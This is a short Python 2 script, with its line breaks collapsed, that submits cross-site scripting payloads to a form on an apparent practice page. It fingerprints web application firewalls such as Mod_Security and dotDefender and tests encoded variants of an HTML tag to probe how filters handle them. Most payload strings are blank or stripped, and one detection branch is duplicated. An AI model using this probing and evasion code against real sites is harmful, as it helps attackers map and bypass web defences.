import mechanize as mec maliciousRequest = mec.Browser() formName = 'waf' maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html") maliciousRequest.select_form(formName) crossSiteScriptingPayLoad = "

" maliciousRequest.form['data'] = crossSiteScriptingPayLoad maliciousRequest.submit() response = maliciousRequest.response().read() print response if response.find('WebKnight') >= 0: print "Firewall detected: WebKnight" elif response.find('Mod_Security') >= 0: print "Firewall detected: Mod Security" elif response.find('Mod_Security') >= 0: print "Firewall detected: Mod Security" elif response.find('dotDefender') >= 0: print "Firewall detected: Dot Defender" else: print "No Firewall Present" listofPayloads = ['

', '', 'CLICK ME'] for payLoads in listofPayloads: maliciousRequest = mec.Browser() formName = 'waf' maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html") maliciousRequest.select_form(formName) maliciousRequest.form['data'] = payLoads maliciousRequest.submit() response = maliciousRequest.response().read() print "---------------------------------------------------" if response.find('WebKnight') >= 0: print "Firewall detected: WebKnight" elif response.find('Mod_Security') >= 0: print "Firewall detected: Mod Security" elif response.find('Mod_Security') >= 0: print "Firewall detected: Mod Security" elif response.find('dotDefender') >= 0: print "Firewall detected: Dot Defender" else: print "No Firewall Present" print "---------------------------------------------------" listofPayloads = ['<b>','\u003cb\u003e','\x3cb\x3e'] for payLoads in listofPayloads: maliciousRequest = mec.Browser() formName = 'waf' maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html") maliciousRequest.select_form(formName) maliciousRequest.form['data'] = payLoads maliciousRequest.submit() response = maliciousRequest.response().read() print "---------------------------------------------------" print response print "---------------------------------------------------"